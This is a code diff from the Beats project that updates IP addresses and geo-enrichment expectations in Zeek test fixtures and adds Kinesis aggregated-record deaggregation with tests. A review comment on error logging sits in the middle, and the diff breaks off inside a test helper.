+{"ts":1602116947.977,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"67.43.156.12","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":3,"stratum":0,"poll":1,"precision":1,"root_delay":0,"root_disp":0,"ref_id":"\\x00\\x00\\x00\\x00","ref_time":0,"org_time":0,"rec_time":0,"xmt_time":1602116947.215,"num_exts":0}
+{"ts":1602116948.081,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"67.43.156.12","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":4,"stratum":2,"poll":8,"precision":5.960464477539063e-8,"root_delay":0.00921630859375,"root_disp":0.0212249755859375,"ref_id":"127.67.113.92","ref_time":1602116655.942,"org_time":1602116947.215,"rec_time":1602116947.964,"xmt_time":1602116947.964,"num_exts":0}
diff --git a/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log-expected.json b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log-expected.json
index 7c7b34cbefac..2ac60a5843d5 100644
--- a/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log-expected.json
@@ -2,13 +2,6 @@ { "@timestamp": "2020-10-08T00:29:07.977Z", "destination.address": "208.79.89.249", - "destination.as.number": 25795, - "destination.as.organization.name": "ARP NETWORKS, INC.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.79.89.249", "destination.port": 123, "event.category": [ @@ -17,7 +10,7 @@ "event.dataset": "zeek.ntp", "event.kind": "event", "event.module": "zeek", - "event.original": "{\"ts\":1602116947.977,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"130.118.205.62\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":3,\"stratum\":0,\"poll\":1,\"precision\":1,\"root_delay\":0,\"root_disp\":0,\"ref_id\":\"\\\\x00\\\\x00\\\\x00\\\\x00\",\"ref_time\":0,\"org_time\":0,\"rec_time\":0,\"xmt_time\":1602116947.215,\"num_exts\":0}", + "event.original": "{\"ts\":1602116947.977,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"67.43.156.12\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":3,\"stratum\":0,\"poll\":1,\"precision\":1,\"root_delay\":0,\"root_disp\":0,\"ref_id\":\"\\\\x00\\\\x00\\\\x00\\\\x00\",\"ref_time\":0,\"org_time\":0,\"rec_time\":0,\"xmt_time\":1602116947.215,\"num_exts\":0}", "event.type": [ "connection", "info", 
@@ -26,23 +19,24 @@ "fileset.name": "ntp", "input.type": "log", "log.offset": 0, - "network.community_id": "1:IDiKR+C1G8mk7LQhFpp+4p1tHrk=", + "network.community_id": "1:muwkrDW4UPGLQ9iNHdBLBx3RwS8=", "network.direction": "external", "network.protocol": "ntp", "network.transport": "udp", "network.type": "ipv4", "related.ip": [ - "130.118.205.62", - "208.79.89.249" + "208.79.89.249", + "67.43.156.12" ], "service.type": "zeek", - "source.address": "130.118.205.62", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "130.118.205.62", + "source.address": "67.43.156.12", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "source.port": 38461, "tags": [ "zeek.ntp" @@ -65,13 +59,6 @@ { "@timestamp": "2020-10-08T00:29:08.081Z", "destination.address": "208.79.89.249", - "destination.as.number": 25795, - "destination.as.organization.name": "ARP NETWORKS, INC.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.79.89.249", "destination.port": 123, "event.category": [ 
@@ -80,7 +67,7 @@ "event.dataset": "zeek.ntp", "event.kind": "event", "event.module": "zeek", - "event.original": "{\"ts\":1602116948.081,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"130.118.205.62\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":4,\"stratum\":2,\"poll\":8,\"precision\":5.960464477539063e-8,\"root_delay\":0.00921630859375,\"root_disp\":0.0212249755859375,\"ref_id\":\"127.67.113.92\",\"ref_time\":1602116655.942,\"org_time\":1602116947.215,\"rec_time\":1602116947.964,\"xmt_time\":1602116947.964,\"num_exts\":0}", + "event.original": "{\"ts\":1602116948.081,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"67.43.156.12\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":4,\"stratum\":2,\"poll\":8,\"precision\":5.960464477539063e-8,\"root_delay\":0.00921630859375,\"root_disp\":0.0212249755859375,\"ref_id\":\"127.67.113.92\",\"ref_time\":1602116655.942,\"org_time\":1602116947.215,\"rec_time\":1602116947.964,\"xmt_time\":1602116947.964,\"num_exts\":0}", "event.type": [ "connection", "info", 
@@ -88,24 +75,25 @@ ], "fileset.name": "ntp", "input.type": "log", - "log.offset": 335, - "network.community_id": "1:IDiKR+C1G8mk7LQhFpp+4p1tHrk=", + "log.offset": 333, + "network.community_id": "1:muwkrDW4UPGLQ9iNHdBLBx3RwS8=", "network.direction": "external", "network.protocol": "ntp", "network.transport": "udp", "network.type": "ipv4", "related.ip": [ - "130.118.205.62", - "208.79.89.249" + "208.79.89.249", + "67.43.156.12" ], "service.type": "zeek", - "source.address": "130.118.205.62", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "130.118.205.62", + "source.address": "67.43.156.12", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "source.port": 38461, "tags": [ "zeek.ntp" diff --git a/x-pack/filebeat/module/zeek/signature/test/signature-json.log b/x-pack/filebeat/module/zeek/signature/test/signature-json.log index 4725117d90e6..068a71b6fb0e 100644 --- a/x-pack/filebeat/module/zeek/signature/test/signature-json.log +++ b/x-pack/filebeat/module/zeek/signature/test/signature-json.log @@ -1 +1 @@ -{"ts": 1611852809.869245,"uid": "CbjAXE4CBxJ8W7VoJg","src_addr": "124.51.137.154","src_port": 51617,"dst_addr": "160.218.27.63","dst_port": 445,"note": "Signatures::Sensitive_Signature","sig_id": "my-second-sig","event_msg": "124.51.137.154: TCP traffic","sub_msg": ""} +{"ts": 1611852809.869245,"uid": "CbjAXE4CBxJ8W7VoJg","src_addr": "175.16.199.1","src_port": 51617,"dst_addr": "160.218.27.63","dst_port": 445,"note": "Signatures::Sensitive_Signature","sig_id": "my-second-sig","event_msg": "175.16.199.1: TCP traffic","sub_msg": ""} 
diff --git a/x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json b/x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json
index 6951cedca700..a3e18134e612 100644
--- a/x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json
@@ -2,42 +2,33 @@ { "@timestamp": "2021-01-28T16:53:29.869Z", "destination.address": "160.218.27.63", - "destination.as.number": 5610, - "destination.as.organization.name": "O2 Czech Republic, a.s.", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "CZ", - "destination.geo.country_name": "Czechia", - "destination.geo.location.lat": 50.0848, - "destination.geo.location.lon": 14.4112, "destination.ip": "160.218.27.63", "destination.port": 445, "event.dataset": "zeek.signature", "event.kind": "alert", "event.module": "zeek", - "event.original": "{\"ts\": 1611852809.869245,\"uid\": \"CbjAXE4CBxJ8W7VoJg\",\"src_addr\": \"124.51.137.154\",\"src_port\": 51617,\"dst_addr\": \"160.218.27.63\",\"dst_port\": 445,\"note\": \"Signatures::Sensitive_Signature\",\"sig_id\": \"my-second-sig\",\"event_msg\": \"124.51.137.154: TCP traffic\",\"sub_msg\": \"\"}", + "event.original": "{\"ts\": 1611852809.869245,\"uid\": \"CbjAXE4CBxJ8W7VoJg\",\"src_addr\": \"175.16.199.1\",\"src_port\": 51617,\"dst_addr\": \"160.218.27.63\",\"dst_port\": 445,\"note\": \"Signatures::Sensitive_Signature\",\"sig_id\": \"my-second-sig\",\"event_msg\": \"175.16.199.1: TCP traffic\",\"sub_msg\": \"\"}", "fileset.name": "signature", "input.type": "log", "log.offset": 0, "network.direction": "external", "related.ip": [ - "124.51.137.154", - "160.218.27.63" + "160.218.27.63", + "175.16.199.1" ], - "rule.description": "124.51.137.154: TCP traffic", + "rule.description": "175.16.199.1: TCP traffic", "rule.id": "my-second-sig", "service.type": "zeek", - "source.address": "124.51.137.154", - "source.as.number": 17858, - "source.as.organization.name": "LG POWERCOMM", - "source.geo.city_name": "Busan", + "source.address": "175.16.199.1", + "source.geo.city_name": "Changchun", "source.geo.continent_name": "Asia", - "source.geo.country_iso_code": "KR", - "source.geo.country_name": "South Korea", - "source.geo.location.lat": 35.1003, - "source.geo.location.lon": 129.0442, - 
"source.geo.region_iso_code": "KR-26", - "source.geo.region_name": "Busan", - "source.ip": "124.51.137.154", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "source.port": 51617, "tags": [ "zeek.signature" diff --git a/x-pack/filebeat/module/zeek/sip/test/sip-json.log b/x-pack/filebeat/module/zeek/sip/test/sip-json.log index 0442b80670b4..12d956755b1d 100644 --- a/x-pack/filebeat/module/zeek/sip/test/sip-json.log +++ b/x-pack/filebeat/module/zeek/sip/test/sip-json.log 
@@ -1,3 +1,3 @@ {"ts":1361916159.055464,"uid":"CPRLCB4eWHdjP852Bk","id.orig_h":"172.16.133.19","id.orig_p":5060,"id.resp_h":"74.63.41.218","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:newyork.voip.ms:5060","request_from":"\u0022AppNeta\u0022 ","request_to":"","response_from":"\u0022AppNeta\u0022 ","response_to":";tag=as023f66a5","call_id":"8694cd7e-976e4fc3-d76f6e38@172.16.133.19","seq":"4127 REGISTER","request_path":["SIP/2.0/UDP 172.16.133.19:5060"],"response_path":["SIP/2.0/UDP 172.16.133.19:5060"],"user_agent":"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267","status_code":401,"status_msg":"Unauthorized","request_body_len":0,"response_body_len":0} -{"ts":1105725482.965944,"uid":"ComJz236lSOcuOmix3","id.orig_h":"200.57.7.204","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"INVITE","uri":"sip:francisco@bestel.com:55060","request_from":"","request_to":"\u0022francisco@bestel.com\u0022 ","response_from":"","response_to":"\u0022francisco@bestel.com\u0022 ;tag=298852044","call_id":"12013223@200.57.7.195","seq":"1 INVITE","request_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"response_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061","SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"status_code":180,"status_msg":"Ringing","request_body_len":229,"response_body_len":0} -{"ts":1105725487.022577,"uid":"CJZDWgixtwqXctWEg","id.orig_h":"200.57.7.205","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:Verso.com","request_from":"Ivan ","request_to":"Ivan ","response_from":"\u0022Ivan\u0022 ","response_to":"\u0022Ivan\u0022 ","call_id":"46E1C3CB36304F84A020CF6DD3F96461@Verso.com","seq":"37764 REGISTER","request_path":["SIP/2.0/UDP 200.57.7.205:5061;rport"],"response_path":["SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061"],"user_agent":"Verso Softphone release 
1104w","status_code":200,"status_msg":"OK","request_body_len":0,"response_body_len":0} +{"ts":1105725482.965944,"uid":"ComJz236lSOcuOmix3","id.orig_h":"216.160.83.57","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"INVITE","uri":"sip:francisco@bestel.com:55060","request_from":"","request_to":"\u0022francisco@bestel.com\u0022 ","response_from":"","response_to":"\u0022francisco@bestel.com\u0022 ;tag=298852044","call_id":"12013223@200.57.7.195","seq":"1 INVITE","request_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"response_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061","SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"status_code":180,"status_msg":"Ringing","request_body_len":229,"response_body_len":0} +{"ts":1105725487.022577,"uid":"CJZDWgixtwqXctWEg","id.orig_h":"67.43.156.12","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:Verso.com","request_from":"Ivan ","request_to":"Ivan ","response_from":"\u0022Ivan\u0022 ","response_to":"\u0022Ivan\u0022 ","call_id":"46E1C3CB36304F84A020CF6DD3F96461@Verso.com","seq":"37764 REGISTER","request_path":["SIP/2.0/UDP 67.43.156.12:5061;rport"],"response_path":["SIP/2.0/UDP 67.43.156.12:5061;received=67.43.156.12;rport=5061"],"user_agent":"Verso Softphone release 1104w","status_code":200,"status_msg":"OK","request_body_len":0,"response_body_len":0} diff --git a/x-pack/filebeat/module/zeek/sip/test/sip-json.log-expected.json b/x-pack/filebeat/module/zeek/sip/test/sip-json.log-expected.json index 5352052b0cd8..ce78c412c513 100644 --- a/x-pack/filebeat/module/zeek/sip/test/sip-json.log-expected.json +++ b/x-pack/filebeat/module/zeek/sip/test/sip-json.log-expected.json 
@@ -2,13 +2,6 @@ { "@timestamp": "2013-02-26T22:02:39.055Z", "destination.address": "74.63.41.218", - "destination.as.number": 29791, - "destination.as.organization.name": "Internap Corporation", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "74.63.41.218", "destination.port": 5060, "event.action": "REGISTER", @@ -72,16 +65,6 @@ { "@timestamp": "2005-01-14T17:58:02.965Z", "destination.address": "200.57.7.195", - "destination.as.number": 18734, - "destination.as.organization.name": "Operbes, S.A. de C.V.", - "destination.geo.city_name": "Mexico City", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "MX", - "destination.geo.country_name": "Mexico", - "destination.geo.location.lat": 19.4357, - "destination.geo.location.lon": -99.1438, - "destination.geo.region_iso_code": "MX-CMX", - "destination.geo.region_name": "Mexico City", "destination.ip": "200.57.7.195", "destination.port": 5060, "event.action": "INVITE", 
@@ -100,27 +83,26 @@ "fileset.name": "sip", "input.type": "log", "log.offset": 805, - "network.community_id": "1:U/Makwsc8lm6pVKLfRMzoNTI++0=", + "network.community_id": "1:jfUDdOppqfMcEoQi8CpFBcxqBwc=", "network.direction": "external", "network.protocol": "sip", "network.transport": "udp", "related.ip": [ "200.57.7.195", - "200.57.7.204" + "216.160.83.57" ], "service.type": "zeek", - "source.address": "200.57.7.204", - "source.as.number": 18734, - "source.as.organization.name": "Operbes, S.A. de C.V.", - "source.geo.city_name": "Mexico City", + "source.address": "216.160.83.57", + "source.as.number": 209, + "source.geo.city_name": "Milton", "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "MX", - "source.geo.country_name": "Mexico", - "source.geo.location.lat": 19.4357, - "source.geo.location.lon": -99.1438, - "source.geo.region_iso_code": "MX-CMX", - "source.geo.region_name": "Mexico City", - "source.ip": "200.57.7.204", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "source.port": 5061, "tags": [ "zeek.sip" @@ -158,16 +140,6 @@ { "@timestamp": "2005-01-14T17:58:07.022Z", "destination.address": "200.57.7.195", - "destination.as.number": 18734, - "destination.as.organization.name": "Operbes, S.A. de C.V.", - "destination.geo.city_name": "Mexico City", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "MX", - "destination.geo.country_name": "Mexico", - "destination.geo.location.lat": 19.4357, - "destination.geo.location.lon": -99.1438, - "destination.geo.region_iso_code": "MX-CMX", - "destination.geo.region_name": "Mexico City", "destination.ip": "200.57.7.195", "destination.port": 5060, "event.action": "REGISTER", 
@@ -185,28 +157,24 @@ ], "fileset.name": "sip", "input.type": "log", - "log.offset": 1654, - "network.community_id": "1:0hvHF/bh5wFKg7nfRXxsno4F198=", + "log.offset": 1655, + "network.community_id": "1:NaElKLXPJh/FxFEgOVrBVQq7ziE=", "network.direction": "external", "network.protocol": "sip", "network.transport": "udp", "related.ip": [ "200.57.7.195", - "200.57.7.205" + "67.43.156.12" ], "service.type": "zeek", - "source.address": "200.57.7.205", - "source.as.number": 18734, - "source.as.organization.name": "Operbes, S.A. de C.V.", - "source.geo.city_name": "Mexico City", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "MX", - "source.geo.country_name": "Mexico", - "source.geo.location.lat": 19.4357, - "source.geo.location.lon": -99.1438, - "source.geo.region_iso_code": "MX-CMX", - "source.geo.region_name": "Mexico City", - "source.ip": "200.57.7.205", + "source.address": "67.43.156.12", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "source.port": 5061, "tags": [ "zeek.sip" @@ -219,13 +187,13 @@ "zeek.sip.request.body_length": 0, "zeek.sip.request.from": "Ivan ", "zeek.sip.request.path": [ - "SIP/2.0/UDP 200.57.7.205:5061;rport" + "SIP/2.0/UDP 67.43.156.12:5061;rport" ], "zeek.sip.request.to": "Ivan ", "zeek.sip.response.body_length": 0, "zeek.sip.response.from": "\"Ivan\" ", "zeek.sip.response.path": [ - "SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061" + "SIP/2.0/UDP 67.43.156.12:5061;received=67.43.156.12;rport=5061" ], "zeek.sip.response.to": "\"Ivan\" ", "zeek.sip.sequence.method": "REGISTER", diff --git a/x-pack/filebeat/module/zeek/ssl/test/ssl-json.log-expected.json b/x-pack/filebeat/module/zeek/ssl/test/ssl-json.log-expected.json index d7c6816aa069..048a32642c0c 100644 
--- a/x-pack/filebeat/module/zeek/ssl/test/ssl-json.log-expected.json +++ b/x-pack/filebeat/module/zeek/ssl/test/ssl-json.log-expected.json @@ -3,16 +3,6 @@ "@timestamp": "2019-01-17T01:32:16.805Z", "client.address": "10.178.98.102", "destination.address": "35.199.178.4", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.city_name": "Mountain View", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.4043, - "destination.geo.location.lon": -122.0748, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "35.199.178.4", "destination.port": 9243, "event.category": [ @@ -86,16 +76,6 @@ "@timestamp": "2019-01-17T01:32:16.805Z", "client.address": "10.178.98.102", "destination.address": "35.199.178.4", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.city_name": "Mountain View", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.4043, - "destination.geo.location.lon": -122.0748, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "35.199.178.4", "destination.port": 9243, "event.category": [ diff --git a/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log b/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log index b3595d55a6bd..ba22a03e9bcd 100644 --- a/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log +++ b/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log @@ -1 +1 @@ -{"ts":1361916158.650605,"src":"192.168.1.1","dst":"8.8.8.8","proto":"udp"} +{"ts":1361916158.650605,"src":"192.168.1.1","dst":"175.16.199.1","proto":"udp"} 
diff --git a/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log-expected.json b/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log-expected.json index 89e3ebcbe095..fc254db12d04 100644 --- a/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log-expected.json +++ b/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log-expected.json @@ -1,15 +1,16 @@ [ { "@timestamp": "2013-02-26T22:02:38.650Z", - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.address": "175.16.199.1", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "event.category": [ "network" ], @@ -25,8 +26,8 @@ "network.direction": "outbound", "network.transport": "udp", "related.ip": [ - "192.168.1.1", - "8.8.8.8" + "175.16.199.1", + "192.168.1.1" ], "service.type": "zeek", "source.address": "192.168.1.1", diff --git a/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log b/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log index 139a6591c755..16768851dd03 100644 --- a/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log +++ b/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log 
@@ -1 +1 @@
-{"ts":1544405666.743509,"id.orig_h":"132.16.146.79","id.orig_p":0,"id.resp_h":"132.16.110.133","id.resp_p":8080,"tunnel_type":"Tunnel::HTTP","action":"Tunnel::DISCOVER"}
+{"ts":1544405666.743509,"id.orig_h":"89.160.20.112","id.orig_p":0,"id.resp_h":"132.16.110.133","id.resp_p":8080,"tunnel_type":"Tunnel::HTTP","action":"Tunnel::DISCOVER"}
diff --git a/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log-expected.json b/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log-expected.json
index 9138243618c3..2f512e4637b9 100644
--- a/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log-expected.json
@@ -2,13 +2,8 @@
 {
 "@timestamp": "2018-12-10T01:34:26.743Z",
 "destination.address": "132.16.110.133",
- "destination.as.number": 427,
- "destination.as.organization.name": "Air Force Systems Networking",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
+ "destination.as.number": 721,
+ "destination.as.organization.name": "DoD Network Information Center",
 "destination.ip": "132.16.110.133",
 "destination.port": 8080,
 "event.action": "Tunnel::DISCOVER",
@@ -27,18 +22,21 @@
 "network.direction": "external",
 "related.ip": [
 "132.16.110.133",
- "132.16.146.79"
+ "89.160.20.112"
 ],
 "service.type": "zeek",
- "source.address": "132.16.146.79",
- "source.as.number": 427,
- "source.as.organization.name": "Air Force Systems Networking",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "132.16.146.79",
+ "source.address": "89.160.20.112",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.112",
 "source.port": 0,
 "tags": [
 "zeek.tunnel"
diff --git a/x-pack/functionbeat/provider/aws/aws/kinesis.go b/x-pack/functionbeat/provider/aws/aws/kinesis.go
index 86d1d92959a0..2cdc02d075e7 100644
--- a/x-pack/functionbeat/provider/aws/aws/kinesis.go
+++ b/x-pack/functionbeat/provider/aws/aws/kinesis.go
@@ -146,9 +146,12 @@ func (k *Kinesis) createHandler(client core.Client) func(request events.KinesisE
 return func(request events.KinesisEvent) error {
 k.log.Debugf("The handler receives %d events", len(request.Records))
- events := transformer.KinesisEvent(request)
+ events, err := transformer.KinesisEvent(request)
+ if err != nil {
+ return err
+ }
- if err := client.PublishAll(events); err != nil {
+ if err = client.PublishAll(events); err != nil {
 k.log.Errorf("Could not publish events to the pipeline, error: %+v", err)
 return err
 }
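Review bot: The error from `transformer.KinesisEvent` is returned bare, while the `PublishAll` branch a few lines down logs its failure first, so a deaggregation failure on a malformed record leaves no trace in the function's own log. Mirror the sibling branch, `k.log.Errorf("Could not transform kinesis records, error: %+v", err)` before `return err`, or wrap the error with the failing record's identifier so the cause survives upstream. Returning an error here fails the whole batch; if the event source mapping retries failed invocations (not visible in this hunk), one bad aggregated record would block the shard until the record expires, so it is worth deciding explicitly whether such records should fail the batch or be logged and skipped. The enclosing handler starts and ends outside the hunk.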
diff --git a/x-pack/functionbeat/provider/aws/aws/kinesis_test.go b/x-pack/functionbeat/provider/aws/aws/kinesis_test.go
index 762cce1006df..d99e3640071d 100644
--- a/x-pack/functionbeat/provider/aws/aws/kinesis_test.go
+++ b/x-pack/functionbeat/provider/aws/aws/kinesis_test.go
@@ -5,11 +5,16 @@ package aws
 import (
+ "crypto/md5"
 "errors"
 "fmt"
+ "strconv"
 "testing"
 "github.com/aws/aws-lambda-go/events"
+ "github.com/awslabs/kinesis-aggregation/go/deaggregator"
+ aggRecProto "github.com/awslabs/kinesis-aggregation/go/records"
+ "github.com/golang/protobuf/proto"
 "github.com/stretchr/testify/assert"
 "github.com/elastic/beats/v7/libbeat/common"
@@ -39,6 +44,19 @@ func TestKinesis(t *testing.T) {
 assert.NoError(t, err)
 })
+ t.Run("when publish with agg is successful", func(t *testing.T) {
+ client := &arrayBackedClient{}
+ k, err := NewKinesis(&provider.DefaultProvider{}, cfg)
+ if !assert.NoError(t, err) {
+ return
+ }
+
+ c, _ := k.(*Kinesis)
+ handler := c.createHandler(client)
+ err = handler(generateAggregatedKinesisEvent(true))
+ assert.NoError(t, err)
+ })
+
 t.Run("when publish is not successful", func(t *testing.T) {
 e := errors.New("something bad")
 client := &arrayBackedClient{err: e}
@@ -54,6 +72,19 @@ func TestKinesis(t *testing.T) {
 assert.Equal(t, e, err)
 })
+ t.Run("when publish with agg is not successful", func(t *testing.T) {
+ client := &arrayBackedClient{}
+ k, err := NewKinesis(&provider.DefaultProvider{}, cfg)
+ if !assert.NoError(t, err) {
+ return
+ }
+
+ c, _ := k.(*Kinesis)
+ handler := c.createHandler(client)
+ err = handler(generateAggregatedKinesisEvent(false))
+ assert.Error(t, err)
+ })
+
 t.Run("test config validation", testKinesisConfig)
 t.Run("test starting position", testStartingPosition)
 }
@@ -78,6 +109,54 @@ func generateKinesisEvent() events.KinesisEvent {
 }
 }
+func generateAggregatedKinesisEvent(validRec bool) events.KinesisEvent {
+ // Heavily based on https://github.com/awslabs/kinesis-aggregation/blob/master/go/deaggregator/deaggregator_test.go
+ aggRec := &aggRecProto.AggregatedRecord{}
+ unquotedHeader, err := strconv.Unquote(deaggregator.KplMagicHeader)
+ if err != nil {
+ panic(err)
+ }
+ aggRecBytes := []byte(unquotedHeader)
+ partKeyTable := make([]string, 0)
+ partKey := uint64(0)
+ hashKey := uint64(0)
+ r := &aggRecProto.Record{
+ ExplicitHashKeyIndex: &hashKey,
+ Data: []byte("hello world"),
+ Tags: make([]*aggRecProto.Tag, 0),
+ }
+ // This seems to be the only way to trigger the deaggregation module to return an error when needed
+ if validRec {
+ r.PartitionKeyIndex = &partKey
+ }
+ aggRec.Records = append(aggRec.Records, r)
+ partKeyTable = append(partKeyTable, "0")
+
+ aggRec.PartitionKeyTable = partKeyTable
+ data, _ := proto.Marshal(aggRec)
+ md5Hash := md5.Sum(data)
+ aggRecBytes = append(aggRecBytes, data...)
+ aggRecBytes = append(aggRecBytes, md5Hash[:]...)
+
+ return events.KinesisEvent{
+ Records: []events.KinesisEventRecord{
+ events.KinesisEventRecord{
+ AwsRegion: "east-1",
+ EventID: "1234",
+ EventName: "connect",
+ EventSource: "web",
+ EventSourceArn: "arn:aws:iam::00000000:role/functionbeat",
+ Kinesis: events.KinesisRecord{
